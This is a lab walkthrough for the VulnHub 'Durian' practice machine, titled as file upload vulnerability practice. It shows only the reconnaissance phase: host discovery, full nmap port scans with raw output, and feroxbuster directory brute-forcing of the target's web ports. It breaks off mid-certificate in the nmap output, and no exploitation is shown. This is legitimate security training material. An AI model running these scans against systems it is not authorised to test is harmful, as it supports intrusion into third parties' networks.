File Upload Vulnerability Practice on the Durian Target: Pentest Day 13
I. Target Setup
Download: http://www.vulnhub.com/entry/durian-1,553/
Change the VM's network mode so that it sits on the same network as Kali.
II. Walkthrough
1. Scan the network from Kali; the target is found at 192.168.174.138.
netdiscover -r 192.168.174.0/24
2. Port-scan 192.168.174.138 from Kali. Port 8000 is nginx 1.14.2, port 7080 is LiteSpeed and port 8088 is LiteSpeed; 7080 is the admin console, 8088 is the front end, and 8000 proxies 8088.
nmap -sC -sV -p- 192.168.174.138 -n -vv --min-rate=2000
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 28:1c:64:fa:9c:c3:d2:d4:bb:76:3d:3b:10:e2:b1:25 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcIoZ27ulKq07HoP1IAw+p+ngZIw9E1wu2RSr/iVSr8jF8avZE4uJPET1cjydV6nBG5RPzhakghCPmAAukzctDBhPn5bMgWPMCVOv5DisAIldp6H44iQJWYsAAMxbgurBxfwLVVIeL2xyCxwK70G59QtOjCCLPIcoXo2MtNn2IC5rgLYY2UgL0SeNfblLkKKMscxAQgKZ6dh63aFT+j6Y0WHxn+N5uaySNG7CPxamddeKHNwoSdC1FZuMfAPRGGqDfH4OHAtu5/zYDWgP/BLheBalHR/TP8KYC1hDhbI+5fLCykSTT7Q8qXI9XtqfYnYoGwF5XqQX0ljw1ue9zKPhF
|   256 da:b2:e1:7f:7c:1b:58:cf:fd:4f:74:e9:23:6d:51:d7 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPCIIPNvjo5nfOTzx/1iidyta9PBBg5UviiyhuMPxZq06KZccaHk2JobdXSYzKAWlUGYDBOncFRTErBSvkRWkt0=
|   256 41:e1:0c:2b:d4:26:e8:d3:71:bb:9d:f9:61:56:63:c0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJACpKE5LO4W2cn4Y54RR9yUu93wV+fFR7CPMBLBT3AG
7080/tcp open ssl/empowerid syn-ack ttl 64 LiteSpeed
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.0 302 Found
|     x-powered-by: PHP/5.6.36
|     x-frame-options: SAMEORIGIN
|     x-xss-protection: 1;mode=block
|     referrer-policy: same-origin
|     x-content-type-options: nosniff
|     set-cookie: LSUI37FE0C43B84483E0=d3b620b64038c4a2f4954c993ee0eea1; path=/; secure; HttpOnly
|     expires: Thu, 19 Nov 1981 08:52:00 GMT
|     cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|     pragma: no-cache
|     set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     location: /login.php
|     content-type: text/html; charset=UTF-8
|     content-length: 0
|     date: Wed, 14 Sep 2022 01:20:55 GMT
|     server: LiteSpeed
|     alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080";
|   HTTPOptions:
|     HTTP/1.0 302 Found
|     x-powered-by: PHP/5.6.36
|     x-frame-options: SAMEORIGIN
|     x-xss-protection: 1;mode=block
|     referrer-policy: same-origin
|     x-content-type-options: nosniff
|     set-cookie: LSUI37FE0C43B84483E0=9f3792960e7814d08da02910250cf89b; path=/; secure; HttpOnly
|     expires: Thu, 19 Nov 1981 08:52:00 GMT
|     cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|     pragma: no-cache
|     set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     location: /login.php
|     content-type: text/html; charset=UTF-8
|     content-length: 0
|     date: Wed, 14 Sep 2022 01:20:55 GMT
|     server: LiteSpeed
|_    alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080";
|_http-favicon: Unknown favicon MD5: AF89068FFB9883F7D99BB25F75687AC7
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://192.168.174.138:7080/login.php
| ssl-cert: Subject: commonName=durian/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/organizationalUnitName=Testing/initials=CP/dnQualifier=openlitespeed/localityName=Virtual/name=openlitespeed/emailAddress=mail@durian
| Issuer: commonName=durian/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/organizationalUnitName=Testing/initials=CP/dnQualifier=openlitespeed/localityName=Virtual/name=openlitespeed/emailAddress=mail@durian
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-08T02:05:32
| Not valid after: 2022-12-07T02:05:32
| MD5: 9009 c3b8 8777 9a53 9b56 2556 30ee 0e9c
| SHA-1: ab6e 1ab5 d06d 506c c588 d946 b97a c0fd 89f1 5605
| -----BEGIN CERTIFICATE-----
| MIIEMTCCAxmgAwIBAgIUIE+NkC48iwucp8CENgLvUcYH84swDQYJKoZIhvcNAQEL
| BQAwgcUxDzANBgNVBAMMBmR1cmlhbjELMAkGA1UEBhMCVVMxEDAOBgNVBAcMB1Zp
| cnR1YWwxGzAZBgNVBAoMEkxpdGVTcGVlZENvbW11bml0eTEQMA4GA1UECwwHVGVz
| dGluZzELMAkGA1UECAwCTkoxGjAYBgkqhkiG9w0BCQEWC21haWxAZHVyaWFuMRYw
| FAYDVQQpDA1vcGVubGl0ZXNwZWVkMQswCQYDVQQrDAJDUDEWMBQGA1UELhMNb3Bl
| bmxpdGVzcGVlZDAeFw0yMDA5MDgwMjA1MzJaFw0yMjEyMDcwMjA1MzJaMIHFMQ8w
| DQYDVQQDDAZkdXJpYW4xCzAJBgNVBAYTAlVTMRAwDgYDVQQHDAdWaXJ0dWFsMRsw
| GQYDVQQKDBJMaXRlU3BlZWRDb21tdW5pdHkxEDAOBgNVBAsMB1Rlc3RpbmcxCzAJ
| BgNVBAgMAk5KMRowGAYJKoZIhvcNAQkBFgttYWlsQGR1cmlhbjEWMBQGA1UEKQwN
| b3BlbmxpdGVzcGVlZDELMAkGA1UEKwwCQ1AxFjAUBgNVBC4TDW9wZW5saXRlc3Bl
| ZWQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCdqKu/8xCP8hH62rXJ
| PIoL9a+rtHe3HL1bNH3/pDOa7zCcWsEjcpYvl3sVTM3AuqCx1+RMJBKmLAaF8liy
| /eTvs2MLkpLr1zkv+jj3iEMvv9cyMtOJfk10PkBMKYiSffPMwELRHeT2x2tgTY2/
| toDBP8zQeVj8wm8svelG4bFRv8/bIsktJvZDy56nzFmXXjxiO9qBbKlUWLJHRtmT
| H+8whDiiGF55wY8pKJbJNlJa64RnfXxA004zEgmuDnYLPDj+tp2cvEvOZG+TAlTa
| 47FmZL2MkamPTveOB4ZXH+KN2gedEaZqIumb0tXrjahlI6Ukuh45lhz1BUxlriCa
| qPbxAgMBAAGjFzAVMBMGA1UdJQQMMAoGCCsGAQUFBwMBMA0GCSqGSIb3DQEBCwUA
| A4IBAQAlOatyhOSya2XaAK+fAOrjMFT0iF7ekKKRnzwwNJUP50vF9mTMsj8l1Gb4
| rNn545bmtOuGE2GP9BUYyy+dw0NmUVyWBfyJmzZDbosSftwlTU7jJ8V3sM20MaxO
| 1x4181lTv9ROJrrDGrye+Sf2MOahrh5iZ+Mq/LZKZ04MTw7iYRNGgkCIbKISmafa
| qqja3MokTaIdQBf+oCxX7JiR0Jd6YMdmux5p1/xSEuq8GnPgM8mRZiLSkZYOrwB9
| HJhCswI5T79RSJVIrpRbR7g9h1vc+yDDu/SH49g5SGyE/e2YdDRuA/JVyMUKZFBt
| wSErKwtEdoJosbega14/Vpe9uKIr
|_-----END CERTIFICATE-----
|_http-server-header: LiteSpeed
| tls-alpn:
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
8000/tcp open http syn-ack ttl 64 nginx 1.14.2
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: Durian
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
8088/tcp open radan-http syn-ack ttl 64 LiteSpeed
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.0 200 OK
|     etag: "2fd-5f56ea13-40590;;;"
|     last-modified: Tue, 08 Sep 2020 02:18:59 GMT
|     content-type: text/html
|     content-length: 765
|     accept-ranges: bytes
|     date: Wed, 14 Sep 2022 01:20:39 GMT
|     server: LiteSpeed
|     connection: close
|     <html>
|     <body bgcolor="white">
|     <head>
|     <title>Durian</title>
|     <meta name="description" content="We Are Still Alive!">
|     <meta name="keywords" content="Hacked by Ind_C0d3r">
|     <meta name="robots" content="index, follow">
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="language" content="English">
|     </head>
|     <link href="https://fonts.googleapis.com/css?family=Righteous|Saira+Stencil+One&display=swap" rel="stylesheet">
|     <style type="text/css">
|     @font-face {
|     font-family: 'Righteous', cursive;
|     font-family: 'Saira Stencil One', cursive;
|     </style>
|     <center><br><br>
|     <img src="https://www.producemarketguide.com/sites/default/files/Commoditi
|   Socks5:
|     HTTP/1.1 400 Bad Request
|     content-type: text/html
|     cache-control: private, no-cache, max-age=0
|     pragma: no-cache
|     content-length: 1209
|     date: Wed, 14 Sep 2022 01:20:39 GMT
|     server: LiteSpeed
|     connection: close
|     <!DOCTYPE html>
|     <html style="height:100%">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
|     <title> 400 Bad Request
|     </title></head>
|     <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
|     <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
|     style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1>
|     style="margin-top:20px;font-size: 30px;">Bad Request
|     </h2>
|     <p>It is not a valid request!</p>
|_    </div></div><div style="color:#f0f0
|_http-title: Durian
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: LiteSpeed

3. Browse to ports 8000 and 7080 on 192.168.174.138 and take a look.
4. Install the feroxbuster tool on Kali.
5. Brute-force the directories of 192.168.174.138:8088 with feroxbuster.
feroxbuster -u http://192.168.174.138:8088/
301 GET 14l 109w 1260c http://192.168.174.138:8088/css => http://192.168.174.138:8088/css/
301 GET 14l 109w 1260c http://192.168.174.138:8088/cgi-bin => http://192.168.174.138:8088/cgi-bin/
301 GET 14l 109w 1260c http://192.168.174.138:8088/img => http://192.168.174.138:8088/img/
200 GET 20l 51w 765c http://192.168.174.138:8088/
301 GET 14l 109w 1260c http://192.168.174.138:8088/docs => http://192.168.174.138:8088/docs/
301 GET 14l 109w 1260c http://192.168.174.138:8088/docs/css => http://192.168.174.138:8088/docs/css/
301 GET 14l 109w 1260c http://192.168.174.138:8088/docs/img => http://192.168.174.138:8088/docs/img/
301 GET 14l 109w 1260c http://192.168.174.138:8088/docs/zh-CN => http://192.168.174.138:8088/docs/zh-CN/
301 GET 14l 109w 1260c http://192.168.174.138:8088/protected => http://192.168.174.138:8088/protected/
WLD GET 14l 106w 1242c Got 401 for http://192.168.174.138:8088/protected/c5aa00b136ec4fb79681a69cdabf3398 (url length: 32)
WLD GET - - - Wildcard response is static; auto-filtering 1242 responses; toggle this behavior by using --dont-filter
301 GET 14l 109w 1260c http://192.168.174.138:8088/blocked => http://192.168.174.138:8088/blocked/
WLD GET 14l 107w 1227c Got 403 for http://192.168.174.138:8088/blocked/db204517c8d8433ca218ff7793d902f2 (url length: 32)
WLD GET - - - Wildcard response is static; auto-filtering 1227 responses; toggle this behavior by using --dont-filter
WLD GET 14l 107w 1227c Got 403 for http://192.168.174.138:8088/blocked/b52a1d0522674faeb005d23944a2ed0aeaa4dd719ed04ac8b4903b23f208c3c88df

6. Brute-force the directories of 192.168.174.138:8000 with feroxbuster.
feroxbuster -u http://192.168.174.138:8000/
200 GET 20l 51w 765c http://192.168.174.138:8000/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog => http://192.168.174.138:8000/blog/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-content => http://192.168.174.138:8000/blog/wp-content/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin => http://192.168.174.138:8000/blog/wp-admin/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes => http://192.168.174.138:8000/blog/wp-includes/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/js => http://192.168.174.138:8000/blog/wp-includes/js/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/images => http://192.168.174.138:8000/blog/wp-includes/images/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/js => http://192.168.174.138:8000/blog/wp-admin/js/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/css => http://192.168.174.138:8000/blog/wp-includes/css/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/includes => http://192.168.174.138:8000/blog/wp-admin/includes/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/images => http://192.168.174.138:8000/blog/wp-admin/images/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/css => http://192.168.174.138:8000/blog/wp-admin/css/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/user => http://192.168.174.138:8000/blog/wp-admin/user/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-content/themes => http://192.168.174.138:8000/blog/wp-content/themes/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-content/plugins => http://192.168.174.138:8000/blog/wp-content/plugins/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/assets => http://192.168.174.138:8000/blog/wp-includes/assets/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-content/uploads => http://192.168.174.138:8000/blog/wp-content/uploads/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks => http://192.168.174.138:8000/blog/wp-includes/blocks/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/images/media => http://192.168.174.138:8000/blog/wp-includes/images/media/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/search => http://192.168.174.138:8000/blog/wp-includes/blocks/search/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/rss => http://192.168.174.138:8000/blog/wp-includes/blocks/rss/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/archives => http://192.168.174.138:8000/blog/wp-includes/blocks/archives/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/fonts => http://192.168.174.138:8000/blog/wp-includes/fonts/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/gallery => http://192.168.174.138:8000/blog/wp-includes/blocks/gallery/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/video => http://192.168.174.138:8000/blog/wp-includes/blocks/video/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/html => http://192.168.174.138:8000/blog/wp-includes/blocks/html/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/customize => http://192.168.174.138:8000/blog/wp-includes/customize/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/calendar => http://192.168.174.138:8000/blog/wp-includes/blocks/calendar/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/image => http://192.168.174.138:8000/blog/wp-includes/blocks/image/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/audio => http://192.168.174.138:8000/blog/wp-includes/blocks/audio/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/widgets => http://192.168.174.138:8000/blog/wp-includes/widgets/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/code => http://192.168.174.138:8000/blog/wp-includes/blocks/code/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/file => http://192.168.174.138:8000/blog/wp-includes/blocks/file/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/js/widgets => http://192.168.174.138:8000/blog/wp-admin/js/widgets/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/list => http://192.168.174.138:8000/blog/wp-includes/blocks/list/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/js/tinymce => http://192.168.174.138:8000/blog/wp-includes/js/tinymce/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/buttons => http://192.168.174.138:8000/blog/wp-includes/blocks/buttons/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/group => http://192.168.174.138:8000/blog/wp-includes/blocks/group/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/js/jquery => http://192.168.174.138:8000/blog/wp-includes/js/jquery/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/categories => http://192.168.174.138:8000/blog/wp-includes/blocks/categories/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/block => http://192.168.174.138:8000/blog/wp-includes/blocks/block/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/network => http://192.168.174.138:8000/blog/wp-admin/network/
301 GET 7l 12w 185c http://192.168.174.138:8000/cgi-data => http://192.168.174.138:8000/cgi-data/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/sitemaps => http://192.168.174.138:8000/blog/wp-includes/sitemaps/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/maint => http://192.168.174.138:8000/blog/wp-admin/maint/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/quote => http://192.168.174.138:8000/blog/wp-includes/blocks/quote/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/js/dist => http://192.168.174.138:8000/blog/wp-includes/js/dist/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/css/dist => http://192.168.174.138:8000/blog/wp-includes/css/dist/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/js/thickbox => http://192.168.174.138:8000/blog/wp-includes/js/thickbox/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/more => http://192.168.174.138:8000/blog/wp-includes/blocks/more/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/images/smilies => http://192.168.174.138:8000/blog/wp-includes/images/smilies/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/classic => http://192.168.174.138:8000/blog/wp-includes/blocks/classic/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/table => http://192.168.174.138:8000/blog/wp-includes/blocks/table/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/certificates => http://192.168.174.138:8000/blog/wp-includes/certificates/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-admin/css/colors => http://192.168.174.138:8000/blog/wp-admin/css/colors/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/button => http://192.168.174.138:8000/blog/wp-includes/blocks/button/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/sitemaps/providers => http://192.168.174.138:8000/blog/wp-includes/sitemaps/providers/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/columns => http://192.168.174.138:8000/blog/wp-includes/blocks/columns/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/Text => http://192.168.174.138:8000/blog/wp-includes/Text/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/js/swfupload => http://192.168.174.138:8000/blog/wp-includes/js/swfupload/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/column => http://192.168.174.138:8000/blog/wp-includes/blocks/column/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/PHPMailer => http://192.168.174.138:8000/blog/wp-includes/PHPMailer/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-content/uploads/2020 => http://192.168.174.138:8000/blog/wp-content/uploads/2020/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/js/crop => http://192.168.174.138:8000/blog/wp-includes/js/crop/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/missing => http://192.168.174.138:8000/blog/wp-includes/blocks/missing/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-content/plugins/akismet => http://192.168.174.138:8000/blog/wp-content/plugins/akismet/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/blocks/heading => http://192.168.174.138:8000/blog/wp-includes/blocks/heading/
301 GET 7l 12w 185c http://192.168.174.138:8000/blog/wp-includes/images/crystal => http://192.168.174.138:8000/blog/wp-includes/images/crystal/
[####################] - 48s 840000/840000 0s found:68 errors:0

7. Try port 80; it is reachable.
8. Check whether a /blog directory exists on port 80.
9. Re-scan the ports of 192.168.174.138 from Kali; this time port 80 shows up.
nmap -sC -sV -p- 192.168.174.138 -n -vv --min-rate=2000
The first scan probably missed port 80 because that service had failed to start; after rebooting the target and scanning again it appears.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 28:1c:64:fa:9c:c3:d2:d4:bb:76:3d:3b:10:e2:b1:25 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcIoZ27ulKq07HoP1IAw+p+ngZIw9E1wu2RSr/iVSr8jF8avZE4uJPET1cjydV6nBG5RPzhakghCPmAAukzctDBhPn5bMgWPMCVOv5DisAIldp6H44iQJWYsAAMxbgurBxfwLVVIeL2xyCxwK70G59QtOjCCLPIcoXo2MtNn2IC5rgLYY2UgL0SeNfblLkKKMscxAQgKZ6dh63aFT+j6Y0WHxn+N5uaySNG7CPxamddeKHNwoSdC1FZuMfAPRGGqDfH4OHAtu5/zYDWgP/BLheBalHR/TP8KYC1hDhbI+5fLCykSTT7Q8qXI9XtqfYnYoGwF5XqQX0ljw1ue9zKPhF
|   256 da:b2:e1:7f:7c:1b:58:cf:fd:4f:74:e9:23:6d:51:d7 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPCIIPNvjo5nfOTzx/1iidyta9PBBg5UviiyhuMPxZq06KZccaHk2JobdXSYzKAWlUGYDBOncFRTErBSvkRWkt0=
|   256 41:e1:0c:2b:d4:26:e8:d3:71:bb:9d:f9:61:56:63:c0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJACpKE5LO4W2cn4Y54RR9yUu93wV+fFR7CPMBLBT3AG
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Durian
|_http-server-header: Apache/2.4.38 (Debian)
7080/tcp open ssl/empowerid syn-ack ttl 64 LiteSpeed
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.0 302 Found
|     x-powered-by: PHP/5.6.36
|     x-frame-options: SAMEORIGIN
|     x-xss-protection: 1;mode=block
|     referrer-policy: same-origin
|     x-content-type-options: nosniff
|     set-cookie: LSUI37FE0C43B84483E0=9f2d3c89f7d7793d4086a226d0a0140f; path=/; secure; HttpOnly
|     expires: Thu, 19 Nov 1981 08:52:00 GMT
|     cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|     pragma: no-cache
|     set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     location: /login.php
|     content-type: text/html; charset=UTF-8
|     content-length: 0
|     date: Wed, 14 Sep 2022 03:29:38 GMT
|     server: LiteSpeed
|     alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080";
|   HTTPOptions:
|     HTTP/1.0 302 Found
|     x-powered-by: PHP/5.6.36
|     x-frame-options: SAMEORIGIN
|     x-xss-protection: 1;mode=block
|     referrer-policy: same-origin
|     x-content-type-options: nosniff
|     set-cookie: LSUI37FE0C43B84483E0=a6944b6c3fff496bb298e4467489bfd3; path=/; secure; HttpOnly
|     expires: Thu, 19 Nov 1981 08:52:00 GMT
|     cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|     pragma: no-cache
|     set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
|     location: /login.php
|     content-type: text/html; charset=UTF-8
|     content-length: 0
|     date: Wed, 14 Sep 2022 03:29:38 GMT
|     server: LiteSpeed
|_    alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080";
|_http-favicon: Unknown favicon MD5: AF89068FFB9883F7D99BB25F75687AC7
| http-title: LiteSpeed WebAdmin Console
|_Requested resource was https://192.168.174.138:7080/login.php
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=durian/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/emailAddress=mail@durian/dnQualifier=openlitespeed/initials=CP/name=openlitespeed/organizationalUnitName=Testing/localityName=Virtual
| Issuer: commonName=durian/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/emailAddress=mail@durian/dnQualifier=openlitespeed/initials=CP/name=openlitespeed/organizationalUnitName=Testing/localityName=Virtual
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-08T02:05:32
| Not valid after: 2022-12-07T02:05:32
| MD5: 9009 c3b8 8777 9a53 9b56 2556 30ee 0e9c
| SHA-1: ab6e 1ab5 d06d 506c c588 d946 b97a c0fd 89f1 5605
| -----BEGIN CERTIFICATE-----
| MIIEMTCCAxmgAwIBAgIUIE+NkC48iwucp8CENgLvUcYH84swDQYJKoZIhvcNAQEL
| BQAwgcUxDzANBgNVBAMMBmR1cmlhbjELMAkGA1UEBhMCVVMxEDAOBgNVBAcMB1Zp
| cnR1YWwxGzAZBgNVBAoMEkxpdGVTcGVlZENvbW11bml0eTEQMA4GA1UECwwHVGVz
| dGluZzELMAkGA1UECAwCTkoxGjAYBgkqhkiG9w0BCQEWC21haWxAZHVyaWFuMRYw
| FAYDVQQpDA1vcGVubGl0ZXNwZWVkMQswCQYDVQQrDAJDUDEWMBQGA1UELhMNb3Bl
| bmxpdGVzcGVlZDAeFw0yMDA5MDgwMjA1MzJaFw0yMjEyMDcwMjA1MzJaMIHFMQ8w
| DQYDVQQDDAZkdXJpYW4xCzAJBgNVBAYTAlVTMRAwDgYDVQQHDAdWaXJ0dWFsMRsw
| GQYDVQQKDBJMaXRlU3BlZWRDb21tdW5pdHkxEDAOBgNVBAsMB1Rlc3RpbmcxCzAJ
| BgNVBAgMAk5KMRowGAYJKoZIhvcNAQkBFgttYWlsQGR1cmlhbjEWMBQGA1UEKQwN
| b3BlbmxpdGVzcGVlZDELMAkGA1UEKwwCQ1AxFjAUBgNVBC4TDW9wZW5saXRlc3Bl
| ZWQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCdqKu/8xCP8hH62rXJ
| PIoL9a+rtHe3HL1bNH3/pDOa7zCcWsEjcpYvl3sVTM3AuqCx1+RMJBKmLAaF8liy
| /eTvs2MLkpLr1zkv+jj3iEMvv9cyMtOJfk10PkBMKYiSffPMwELRHeT2x2tgTY2/
| toDBP8zQeVj8wm8svelG4bFRv8/bIsktJvZDy56nzFmXXjxiO9qBbKlUWLJHRtmT
| H+8whDiiGF55wY8pKJbJNlJa64RnfXxA004zEgmuDnYLPDj+tp2cvEvOZG+TAlTa
| 47FmZL2MkamPTveOB4ZXH+KN2gedEaZqIumb0tXrjahlI6Ukuh45lhz1BUxlriCa
| qPbxAgMBAAGjFzAVMBMGA1UdJQQMMAoGCCsGAQUFBwMBMA0GCSqGSIb3DQEBCwUA
| A4IBAQAlOatyhOSya2XaAK+fAOrjMFT0iF7ekKKRnzwwNJUP50vF9mTMsj8l1Gb4
| rNn545bmtOuGE2GP9BUYyy+dw0NmUVyWBfyJmzZDbosSftwlTU7jJ8V3sM20MaxO
